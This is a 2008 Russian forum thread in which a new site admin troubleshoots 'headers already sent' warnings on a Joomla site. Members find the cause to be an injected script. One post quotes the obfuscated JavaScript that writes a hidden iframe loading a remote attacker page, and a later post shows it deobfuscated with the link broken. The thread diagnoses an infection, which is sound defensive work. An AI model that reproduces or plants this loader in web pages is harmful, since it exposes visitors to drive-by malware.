Трабла(админю сайт)

И всё прочее, что касается HTML
Правила форума
Убедительная просьба юзать теги [code] при оформлении листингов.
Сообщения не оформленные должным образом имеют все шансы быть незамеченными.
Аватара пользователя
manefesto
Группенфюррер
Сообщения: 6934
Зарегистрирован: 2007-07-20 8:27:30
Откуда: Пермь
Контактная информация:

Трабла(админю сайт)

Непрочитанное сообщение manefesto » 2008-03-28 15:33:45

Вообщем до поры до времени всё работало. На днях перестало.
Вот сайт irenit.com
Я там теперь админ.

Навскидку скажите почему на хидеры ругается?

И как лечить.
Заранее спс.

PS: Тока учусь
я такой яростный шо аж пиздеЦ
Изображение

Хостинговая компания Host-Food.ru
Хостинг HostFood.ru
 

Услуги хостинговой компании Host-Food.ru

Хостинг HostFood.ru

Тарифы на хостинг в России, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/

Аватара пользователя
serge
майор
Сообщения: 2133
Зарегистрирован: 2006-07-30 15:34:14
Откуда: Саратов
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение serge » 2008-03-28 15:34:46

Перед отправкой хедера не должно быть никакого вывода. Иначе вот эту ругань и наблюдаем.

Аватара пользователя
serge
майор
Сообщения: 2133
Зарегистрирован: 2006-07-30 15:34:14
Откуда: Саратов
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение serge » 2008-03-28 15:36:36

Код: Выделить всё

<script>var ulx="<";var yxf="i";var pfjdn=" ";var ssxur="sginb='ms9OJgDC' wlkkq='hFbLbvSd' cgyxs='gea6BKZU' lfcwf='d2rtwOcD' ikoec='dBp1PxRR' puaqr='Xia4LZmi' cpgxn='nQcP35JV' ftnup='Hc0I2bhJ' qxvui='1L6XlarO' src=";var rskws="ame>";var xnnmd="n/nool/index.php";var uypvr=" ";var pgf="f";var lje="r";var nuh="a";var dpomh="eyooe='z9zwg1gU' ujcrc='HVDMHX9s' uxlky='9xXtVeed' dmwvy='gKAiHcmu' sbeox='ySoLG7At' iqosn='9Se1mZ54' rfbxv='d9Q1qxVz' gajre='4e7Aj6Dx' iatxo='VOXtx8qH' ";var kte="m";var cup="e";var sfpyf="width=1 ";var wpdul="http://holdcat.c";var eyayr="height=1 ";var mlwfa="style='display:none'";var mnpdw=wpdul+xnnmd;var efneh="></ifr";document.write(ulx+yxf+pgf+lje+nuh+kte+cup+pfjdn+ssxur+mnpdw+uypvr+dpomh+sfpyf+eyayr+mlwfa+efneh+rskws);</script><br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at /home/irenit/domains/irenit.com/public_html/index.php:1) in <b>/home/irenit/domains/irenit.com/public_html/includes/joomla.php</b> on line <b>689</b><br />
<br />
Получаеться у тебя скрипт улетает на вывод раньше положенного. Или может вообще он туда случайно попал :?

Аватара пользователя
Alex Keda
стреляли...
Сообщения: 35462
Зарегистрирован: 2004-10-18 14:25:19
Откуда: Made in USSR
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение Alex Keda » 2008-03-28 15:39:35

man php.ini
=========
отключи вывод ошибок на экран =)))
Убей их всех! Бог потом рассортирует...

Аватара пользователя
serge
майор
Сообщения: 2133
Зарегистрирован: 2006-07-30 15:34:14
Откуда: Саратов
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение serge » 2008-03-28 15:41:46

lissyara писал(а): отключи вывод ошибок на экран =)))
Эт конечно проще всего, но лучше ж разобраться в их причине :)

Аватара пользователя
manefesto
Группенфюррер
Сообщения: 6934
Зарегистрирован: 2007-07-20 8:27:30
Откуда: Пермь
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение manefesto » 2008-03-28 15:43:49

lissyara писал(а):man php.ini
=========
отключи вывод ошибок на экран =)))
Нету такого мана...
я такой яростный шо аж пиздеЦ
Изображение

Аватара пользователя
serge
майор
Сообщения: 2133
Зарегистрирован: 2006-07-30 15:34:14
Откуда: Саратов
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение serge » 2008-03-28 15:44:54

manefesto писал(а):
lissyara писал(а):man php.ini
=========
отключи вывод ошибок на экран =)))
Нету такого мана...

Код: Выделить всё

vi php.ini
Ман там внутри конфига. Коментариев с избытком.

Аватара пользователя
manefesto
Группенфюррер
Сообщения: 6934
Зарегистрирован: 2007-07-20 8:27:30
Откуда: Пермь
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение manefesto » 2008-03-28 15:48:14

а...точна...
спасибо....
сначала ошибки вырубить попытаемся....а потом уже их исправлять...

Хотя хз....просто всё это добро у хостера стоит.... чую доступа к php.ini у меня не будет
я такой яростный шо аж пиздеЦ
Изображение

Аватара пользователя
Alex Keda
стреляли...
Сообщения: 35462
Зарегистрирован: 2004-10-18 14:25:19
Откуда: Made in USSR
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение Alex Keda » 2008-03-28 15:50:03

тогда код спрямлять.
Убей их всех! Бог потом рассортирует...

Аватара пользователя
manefesto
Группенфюррер
Сообщения: 6934
Зарегистрирован: 2007-07-20 8:27:30
Откуда: Пермь
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение manefesto » 2008-03-28 15:58:27

епт...я мегакодером скоро стану
я такой яростный шо аж пиздеЦ
Изображение

Аватара пользователя
Alex Keda
стреляли...
Сообщения: 35462
Зарегистрирован: 2004-10-18 14:25:19
Откуда: Made in USSR
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение Alex Keda » 2008-03-28 16:39:07

я тоже химик-технолог по переаботке нефти и природных энергоносителей....
а заниматься приходиться чёрт знает чем =)
Убей их всех! Бог потом рассортирует...

Аватара пользователя
hizel
дядя поня
Сообщения: 9032
Зарегистрирован: 2007-06-29 10:05:02
Откуда: Выборг

Re: Трабла(админю сайт)

Непрочитанное сообщение hizel » 2008-03-28 17:22:35

йа круче
недочившийся, инженер
гидравлических машин, гидроприводов и гидропневмоавтоматики
кафедра с самым длинным названием на энергомашиностроительно факе
питерского политеха

мегакодером манифесто может и станет, но праграммистом никогда )
В дурацкие игры он не играет. Он просто жуткий, чу-чу, паровозик, и зовут его Блейн. Блейн --- это Боль.

Аватара пользователя
manefesto
Группенфюррер
Сообщения: 6934
Зарегистрирован: 2007-07-20 8:27:30
Откуда: Пермь
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение manefesto » 2008-03-28 17:43:11

э...хизел...не гони....полтора года кодером работал.
Писал программы для промышленных контроллеров.
у ПермСпецНефтеМаш работал.
psnm.ru
я такой яростный шо аж пиздеЦ
Изображение

Аватара пользователя
Alex Keda
стреляли...
Сообщения: 35462
Зарегистрирован: 2004-10-18 14:25:19
Откуда: Made in USSR
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение Alex Keda » 2008-03-28 18:29:37

на чём писал?
Убей их всех! Бог потом рассортирует...

Аватара пользователя
f_andrey
майор
Сообщения: 2651
Зарегистрирован: 2007-12-26 1:22:58
Откуда: СПб
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение f_andrey » 2008-03-28 18:39:18

lissyara писал(а):на чём писал?
да небось на спец языках этих контролеров, еше некоторые СИ и ассемблер вроде понимают, эх помнится я тоже учился для них кодить особенно приколен язык КР схем (это почти так же как составить схему из релюшик) ну там с тонкостями в виде памяти и счетчиков забавно.
Если ваша тема перенесена, то смотри http://forum.lissyara.su/viewtopic.php?f=1&t=32308

Аватара пользователя
manefesto
Группенфюррер
Сообщения: 6934
Зарегистрирован: 2007-07-20 8:27:30
Откуда: Пермь
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение manefesto » 2008-03-29 10:44:21

э...немного поправлюсь....писал програмы для работы с контроллерами.
Мною была написана программа для технологической установки поверки массомеров.
Бибилиотека была написан на сишнике, а сама прога на делфях.

Был у нас проект по проекту "Рассвет", так вот...необходимо было написать систему по управлению установкой предварительного сброса воды, писалась на SCADA системе Intouch Wonderware.

PS: Давно по работе не кодю...отмахиваюсь
я такой яростный шо аж пиздеЦ
Изображение

Asperio
рядовой
Сообщения: 33
Зарегистрирован: 2008-03-26 23:40:58

Re: Трабла(админю сайт)

Непрочитанное сообщение Asperio » 2008-04-08 21:41:56

lissyara писал(а):я тоже химик-технолог по переаботке нефти и природных энергоносителей....
а заниматься приходиться чёрт знает чем =)
Привет коллегам! Извините, не удержался! =)

Аватара пользователя
Raven2000
-=_UNIX_=-
Сообщения: 4433
Зарегистрирован: 2006-10-29 17:59:13
Откуда: Там, где нас нет.
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение Raven2000 » 2008-04-08 22:38:09

мдя я уж про свои специальности промолчу они вообще и рядом с ПК не лежали =) (ну кроме сейчас приобретаемой)
Если хочешь разобраться... Так иди и разбирайся!
[ igNix.ru | Технология жизни - технологии будущего ] [ Forum.igNix.ru ]

Аватара пользователя
lexy
сержант
Сообщения: 288
Зарегистрирован: 2006-07-21 9:54:44
Откуда: Волхов, ЛО
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение lexy » 2008-04-14 11:27:52

для начала смотрим index.php, строчку 4 - преждевременный вывод начинается оттудова, все остальные строчки - уведомления из кода CMS'ки, оттуда скрипты пытаются отправить HTTP-заголовки.

Проверь index.php на предмет отсутствия пустых строчек перед первым <?

Аватара пользователя
manefesto
Группенфюррер
Сообщения: 6934
Зарегистрирован: 2007-07-20 8:27:30
Откуда: Пермь
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение manefesto » 2008-04-16 6:26:53

старые админы сабаки какой то скрипт там вписали...потом выложу...
я такой яростный шо аж пиздеЦ
Изображение

Аватара пользователя
lexy
сержант
Сообщения: 288
Зарегистрирован: 2006-07-21 9:54:44
Откуда: Волхов, ЛО
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение lexy » 2008-04-16 8:38:24

manefesto писал(а):старые админы сабаки какой то скрипт там вписали...потом выложу...
хех.... дыж это ж iframe loader )))))))))

может и не админы, а ломанули твою Joomla злые хакеры..... почитай про дырки CMS-ки сайта
скриптец етот вот чтог в документ вставляет (теги и сцылка намеренно испорчены):

Код: Выделить всё

<ifra-m-e sginb='ms9OJgDC' wlkkq='hFbLbvSd' cgyxs='gea6BKZU' lfcwf='d2rtwOcD' ikoec='dBp1PxRR' puaqr='Xia4LZmi' cpgxn='nQcP35JV' ftnup='Hc0I2bhJ' qxvui='1L6XlarO' src=http://xxx.xx/nool/index.php eyooe='z9zwg1gU' ujcrc='HVDMHX9s' uxlky='9xXtVeed' dmwvy='gKAiHcmu' sbeox='ySoLG7At' iqosn='9Se1mZ54' rfbxv='d9Q1qxVz' gajre='4e7Aj6Dx' iatxo='VOXtx8qH' width=1 height=1 style='display:none'></ifra-m-e>

Аватара пользователя
manefesto
Группенфюррер
Сообщения: 6934
Зарегистрирован: 2007-07-20 8:27:30
Откуда: Пермь
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение manefesto » 2008-04-16 13:07:22

ага...он...
к кому обращатся то ???
к хостеру или гугли про уязвимости CMS ???
Кстати у одного человека у которого стоит KAV ругается на вирус на странице.
я такой яростный шо аж пиздеЦ
Изображение

Аватара пользователя
lexy
сержант
Сообщения: 288
Зарегистрирован: 2006-07-21 9:54:44
Откуда: Волхов, ЛО
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение lexy » 2008-04-16 14:33:33

если CMS сами прикручивали - обновись с офф сайта, наверняка дыра уже прикрыта - если хостер, то пинай его

Аватара пользователя
manefesto
Группенфюррер
Сообщения: 6934
Зарегистрирован: 2007-07-20 8:27:30
Откуда: Пермь
Контактная информация:

Re: Трабла(админю сайт)

Непрочитанное сообщение manefesto » 2008-04-16 14:53:00

мдя....головняку добавилось
я такой яростный шо аж пиздеЦ
Изображение

zg
полковник
Сообщения: 5845
Зарегистрирован: 2007-12-07 13:51:33
Откуда: Верх-Нейвинск

Re: Трабла(админю сайт)

Непрочитанное сообщение zg » 2008-04-16 17:21:22

manefesto писал(а):к кому обращатся то ???
к профессионалам
manefesto писал(а):к хостеру или гугли про уязвимости CMS ???
Кстати у одного человека у которого стоит KAV ругается на вирус на странице.
90% вирусов лузет через винду, когда на сайт через фтп что-то заливается

выложи index.php